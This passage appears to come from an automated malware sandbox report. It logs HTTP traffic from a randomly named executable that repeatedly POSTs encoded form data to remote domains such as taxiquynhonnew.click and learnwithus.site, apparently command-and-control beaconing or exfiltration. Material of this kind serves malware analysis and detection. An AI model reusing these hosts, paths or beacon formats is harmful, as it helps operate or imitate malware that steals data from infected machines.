                                                            Data Ascii: } if(localStorage.source === sourceData.tikTokSource) { ! function(w, d, t) { w.TiktokAnalyticsObject = t; var ttq = w[t] = w[t] || []; ttq.methods = ["page", "track", "identify", "instances", "debug", "on
                                                            Jan 10, 2025 22:05:47.835390091 CET1236INData Raw: 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 61 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 6f 2c 20 61 29 0a 20 20 20
                                                            Data Ascii: t.getElementsByTagName("script")[0]; a.parentNode.insertBefore(o, a) }; ttq.load(fb_id || 'C5T758KFMUHRC7DGN9U0'); ttq.track('PageView'); }(window, document, 'ttq'); } else { ttq = { tr
                                                            Jan 10, 2025 22:05:47.835428953 CET1236INData Raw: 3d 66 75 6e 63 74 69 6f 6e 28 70 29 7b 79 28 5b 70 5d 29 7d 3b 79 28 63 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 3b 76 61 72 20 73 63 72 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 74 29 5b 30 5d 2c 70 61 72 3d 73 63 72
                                                            Data Ascii: =function(p){y([p])};y(c)}catch(e){}};var scr=d.getElementsByTagName(t)[0],par=scr.parentNode;par.insertBefore(s,scr)})(window,document,"script","https://s.yimg.com/wi/ytc.js","dotq"); }</script><title></title><script>window.onload = funct
                                                            Jan 10, 2025 22:05:47.835459948 CET14INData Raw: 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.114972218.139.62.226805420C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 10, 2025 22:05:53.514230013 CET831OUTPOST /y49d/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.taxiquynhonnew.click
                                                            Origin: http://www.taxiquynhonnew.click
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 202
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.taxiquynhonnew.click/y49d/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 67 74 4c 38 50 3d 72 34 72 4b 63 69 62 56 53 78 34 76 42 51 52 5a 42 77 42 61 4e 6f 4c 76 62 42 4e 47 68 73 2b 47 2f 50 48 7a 76 6f 6b 64 41 6e 63 75 4f 37 4b 34 58 41 58 68 4a 58 70 6e 7a 36 33 66 2f 2f 54 7a 49 4d 34 53 56 47 30 39 72 68 70 34 63 6f 52 7a 53 67 44 6a 65 6e 2b 43 6a 31 4f 38 6a 65 55 63 32 63 69 75 58 72 64 65 61 56 54 59 77 72 6f 49 78 39 4a 35 53 2b 32 71 64 53 71 55 66 42 74 59 64 76 33 57 38 52 72 59 55 51 57 56 36 4d 67 37 51 59 49 59 67 55 79 77 7a 6e 76 6d 47 39 64 51 6b 45 58 56 34 4c 66 76 58 43 35 47 48 53 49 69 72 2f 53 71 68 64 55 46 66 66 77 67 37 68 41 4b 72 41 3d 3d
                                                            Data Ascii: gtL8P=r4rKcibVSx4vBQRZBwBaNoLvbBNGhs+G/PHzvokdAncuO7K4XAXhJXpnz63f//TzIM4SVG09rhp4coRzSgDjen+Cj1O8jeUc2ciuXrdeaVTYwroIx9J5S+2qdSqUfBtYdv3W8RrYUQWV6Mg7QYIYgUywznvmG9dQkEXV4LfvXC5GHSIir/SqhdUFffwg7hAKrA==
                                                            Jan 10, 2025 22:05:54.440963030 CET371INHTTP/1.1 301 Moved Permanently
                                                            Server: openresty
                                                            Date: Fri, 10 Jan 2025 21:05:54 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Location: https://www.taxiquynhonnew.click/y49d/
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.114972318.139.62.226805420C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 10, 2025 22:05:56.068679094 CET851OUTPOST /y49d/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.taxiquynhonnew.click
                                                            Origin: http://www.taxiquynhonnew.click
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 222
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.taxiquynhonnew.click/y49d/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 67 74 4c 38 50 3d 72 34 72 4b 63 69 62 56 53 78 34 76 54 67 42 5a 4e 7a 70 61 4b 49 4c 73 56 68 4e 47 72 4d 2b 4b 2f 50 4c 7a 76 71 49 4e 41 78 30 75 4f 5a 69 34 4e 45 44 68 48 33 70 6e 6e 71 33 57 69 76 54 36 49 4d 30 6b 56 45 77 39 72 68 39 34 63 74 31 7a 56 53 72 69 65 33 2b 45 71 56 4f 2b 38 4f 55 63 32 63 69 75 58 72 4a 34 61 52 2f 59 77 62 34 49 78 59 39 2b 4d 4f 32 72 51 43 71 55 62 42 74 63 64 76 33 30 38 55 7a 68 55 54 2b 56 36 4d 77 37 65 70 49 62 7a 30 79 32 39 48 76 74 49 66 38 2f 6f 33 53 72 31 36 54 43 57 53 39 56 47 55 46 34 37 63 62 39 69 4f 63 48 4c 35 52 51 79 51 6c 44 77 48 74 48 53 73 56 4d 6f 47 74 6c 62 70 49 43 31 54 69 62 70 2f 49 3d
                                                            Data Ascii: gtL8P=r4rKcibVSx4vTgBZNzpaKILsVhNGrM+K/PLzvqINAx0uOZi4NEDhH3pnnq3WivT6IM0kVEw9rh94ct1zVSrie3+EqVO+8OUc2ciuXrJ4aR/Ywb4IxY9+MO2rQCqUbBtcdv308UzhUT+V6Mw7epIbz0y29HvtIf8/o3Sr16TCWS9VGUF47cb9iOcHL5RQyQlDwHtHSsVMoGtlbpIC1Tibp/I=
                                                            Jan 10, 2025 22:05:56.994529009 CET371INHTTP/1.1 301 Moved Permanently
                                                            Server: openresty
                                                            Date: Fri, 10 Jan 2025 21:05:56 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Location: https://www.taxiquynhonnew.click/y49d/
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.114972418.139.62.226805420C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 10, 2025 22:05:58.946949005 CET1864OUTPOST /y49d/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.taxiquynhonnew.click
                                                            Origin: http://www.taxiquynhonnew.click
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1234
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.taxiquynhonnew.click/y49d/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 67 74 4c 38 50 3d 72 34 72 4b 63 69 62 56 53 78 34 76 54 67 42 5a 4e 7a 70 61 4b 49 4c 73 56 68 4e 47 72 4d 2b 4b 2f 50 4c 7a 76 71 49 4e 41 78 4d 75 50 71 61 34 4f 6c 44 68 47 33 70 6e 37 61 33 62 69 76 53 36 49 4d 74 74 56 45 73 44 72 6b 35 34 65 4c 70 7a 51 6a 72 69 56 33 2b 45 6f 56 4f 2f 6a 65 56 59 32 59 4f 51 58 72 5a 34 61 52 2f 59 77 64 38 49 33 4e 4a 2b 4f 4f 32 71 64 53 71 49 66 42 73 42 64 76 76 4f 38 56 48 75 55 6a 65 56 39 74 41 37 54 2f 63 62 70 30 79 30 74 58 75 74 49 66 77 67 6f 32 2f 61 31 36 33 6f 57 51 74 56 47 54 70 6a 68 49 65 2b 78 4e 6b 36 5a 2b 78 44 78 44 4a 66 2b 47 63 7a 54 65 30 7a 7a 78 41 31 51 62 45 4b 68 67 69 4c 71 36 6b 45 59 45 7a 63 72 34 37 53 70 76 79 41 30 4a 45 6e 71 4e 2f 6a 78 47 66 73 41 35 58 39 38 5a 51 75 4e 72 6f 4f 76 6d 37 31 45 50 4e 55 43 77 52 34 71 63 4a 74 4a 30 2f 69 37 68 34 32 46 43 42 4e 74 7a 54 63 78 2f 58 7a 70 70 79 72 76 4c 61 66 74 65 59 65 70 69 6a 50 65 68 36 39 53 66 75 36 6d 42 6e 37 43 34 70 58 73 54 79 74 50 4f 70 78 57 36 4a 7a [TRUNCATED]
                                                            Data Ascii: gtL8P=r4rKcibVSx4vTgBZNzpaKILsVhNGrM+K/PLzvqINAxMuPqa4OlDhG3pn7a3bivS6IMttVEsDrk54eLpzQjriV3+EoVO/jeVY2YOQXrZ4aR/Ywd8I3NJ+OO2qdSqIfBsBdvvO8VHuUjeV9tA7T/cbp0y0tXutIfwgo2/a163oWQtVGTpjhIe+xNk6Z+xDxDJf+GczTe0zzxA1QbEKhgiLq6kEYEzcr47SpvyA0JEnqN/jxGfsA5X98ZQuNroOvm71EPNUCwR4qcJtJ0/i7h42FCBNtzTcx/XzppyrvLafteYepijPeh69Sfu6mBn7C4pXsTytPOpxW6Jzog6zWptYDL6Bet4o4SVbmbjWnX2CTlHtQ0cFCwzG0/2OMg8MsyWFJ+mIQa3VWwWIJ2Yv1GqCI5IVsd7A/Mhe4G3oKP0SNpX0STRXQWHOCxEsTRpDhrXVt2SDez3AZRG5xA64kfbllKGGAlO08cUJI9Yq55G15G3O7BEZjgq7H230ed7n9IMUhA8xqeDZIXli0HGvI02l4QBk+rdarTE33qkNlmVGLv3e51FFbNuVOBbp1X8IB5l4S5mD0P+n5MHbd93PbEfPFPd9vgy7fVD3FQXpfIEhZn/TuMMYcxXrFFbfUPpZqpSIKnQPUSCS6DTGjCQjJTZ+BXFobD6gzd1bik/ND97MC1v8YGDiiagH0CB3Z+L8+uNJZR+LkWxVNwgtUv6hisvK3NviBLo+4OOhjtir/BgoAjBO5VlPShB7g/LrCSSsMArs/wnTqnaF6+omtoHpPVr6iO7KENJvziN6epK7WgYyrBUJd2amINILbUYRHgg+TJhfZzbbwY6brGcmS7HGntDsp3frgReBLj+Iqh82MUP0kRITwWXfla7tKj5y6R9YlIoErd9/k/bWBWt9ll2v5MhMwOPlH2T4tgPxfJ8Hyn/r6RXfbesB0HrFaJEhUTKx2hffCzZ18KKLbaqL72xGjqqN0mQ5cR+mggyQmmgRw4jih28jwp [TRUNCATED]
                                                            Jan 10, 2025 22:05:59.836528063 CET371INHTTP/1.1 301 Moved Permanently
                                                            Server: openresty
                                                            Date: Fri, 10 Jan 2025 21:05:59 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Location: https://www.taxiquynhonnew.click/y49d/
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.114972518.139.62.226805420C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 10, 2025 22:06:01.520277977 CET552OUTGET /y49d/?gtL8P=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDyYrnyrhYUq4o7lYpBsWzTksb8l1Yx6Eo8=&FZg8n=jDOt606X1jh HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.taxiquynhonnew.click
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Jan 10, 2025 22:06:02.464771986 CET516INHTTP/1.1 301 Moved Permanently
                                                            Server: openresty
                                                            Date: Fri, 10 Jan 2025 21:06:02 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Location: https://www.taxiquynhonnew.click/y49d/?gtL8P=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDyYrnyrhYUq4o7lYpBsWzTksb8l1Yx6Eo8=&FZg8n=jDOt606X1jh
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.1149726209.74.77.107805420C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 10, 2025 22:06:15.651770115 CET819OUTPOST /a6qk/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.learnwithus.site
                                                            Origin: http://www.learnwithus.site
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 202
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.learnwithus.site/a6qk/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 67 74 4c 38 50 3d 58 47 30 2b 61 72 68 6c 57 7a 44 6a 4d 68 48 2b 71 62 79 76 65 59 56 66 75 31 6d 4f 62 52 71 61 4c 66 30 63 6f 59 65 69 72 51 78 68 50 47 59 51 41 6e 35 36 70 2b 49 4a 53 55 5a 41 75 6a 30 61 77 49 6a 6d 4d 50 39 76 7a 46 30 52 48 6d 56 30 31 32 6a 77 64 64 77 37 65 49 2b 71 71 67 2b 47 57 70 55 77 62 39 37 36 76 64 4d 6f 48 2f 69 43 65 38 59 4b 4e 70 59 33 47 34 73 35 41 43 5a 64 45 67 2f 62 78 30 4a 35 6a 35 50 61 4c 58 62 6d 67 4f 59 63 50 4f 63 58 4e 44 69 34 51 38 4a 7a 77 6b 4e 53 6e 6d 53 4e 4f 4e 37 38 6f 71 45 35 70 4a 2b 64 2f 46 52 65 5a 32 70 51 73 33 6a 63 56 67 3d 3d
                                                            Data Ascii: gtL8P=XG0+arhlWzDjMhH+qbyveYVfu1mObRqaLf0coYeirQxhPGYQAn56p+IJSUZAuj0awIjmMP9vzF0RHmV012jwddw7eI+qqg+GWpUwb976vdMoH/iCe8YKNpY3G4s5ACZdEg/bx0J5j5PaLXbmgOYcPOcXNDi4Q8JzwkNSnmSNON78oqE5pJ+d/FReZ2pQs3jcVg==
                                                            Jan 10, 2025 22:06:16.294430971 CET533INHTTP/1.1 404 Not Found
                                                            Date: Fri, 10 Jan 2025 21:06:16 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.1149727209.74.77.107805420C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 10, 2025 22:06:18.205348969 CET839OUTPOST /a6qk/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.learnwithus.site
                                                            Origin: http://www.learnwithus.site
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 222
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.learnwithus.site/a6qk/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 67 74 4c 38 50 3d 58 47 30 2b 61 72 68 6c 57 7a 44 6a 50 42 33 2b 6f 38 65 76 56 59 56 59 72 31 6d 4f 41 42 71 65 4c 66 34 63 6f 64 2b 79 72 69 56 68 50 6e 49 51 42 6d 35 36 6f 2b 49 4a 47 45 5a 46 68 44 30 76 77 49 6e 55 4d 4f 52 76 7a 45 51 52 48 6a 52 30 31 46 4c 7a 48 74 77 35 4c 59 2b 6b 75 67 2b 47 57 70 55 77 62 39 48 63 76 64 55 6f 48 50 79 43 64 64 59 46 45 4a 59 30 52 49 73 35 4c 69 59 61 45 67 2f 74 78 31 6c 44 6a 36 33 61 4c 57 72 6d 6c 50 59 66 46 4f 63 52 44 6a 6a 56 52 4f 6b 6d 7a 55 6f 74 6a 56 53 72 4e 2f 33 77 6b 4d 4a 6a 35 71 33 4b 38 57 5a 63 4e 51 49 67 6c 47 47 56 4f 6b 34 35 61 39 6e 33 72 32 63 56 52 66 5a 37 56 67 44 56 58 46 77 3d
                                                            Data Ascii: gtL8P=XG0+arhlWzDjPB3+o8evVYVYr1mOABqeLf4cod+yriVhPnIQBm56o+IJGEZFhD0vwInUMORvzEQRHjR01FLzHtw5LY+kug+GWpUwb9HcvdUoHPyCddYFEJY0RIs5LiYaEg/tx1lDj63aLWrmlPYfFOcRDjjVROkmzUotjVSrN/3wkMJj5q3K8WZcNQIglGGVOk45a9n3r2cVRfZ7VgDVXFw=
                                                            Jan 10, 2025 22:06:18.785733938 CET533INHTTP/1.1 404 Not Found
                                                            Date: Fri, 10 Jan 2025 21:06:18 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.1149728209.74.77.107805420C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 10, 2025 22:06:20.755026102 CET1852OUTPOST /a6qk/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.learnwithus.site
                                                            Origin: http://www.learnwithus.site
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1234
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.learnwithus.site/a6qk/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
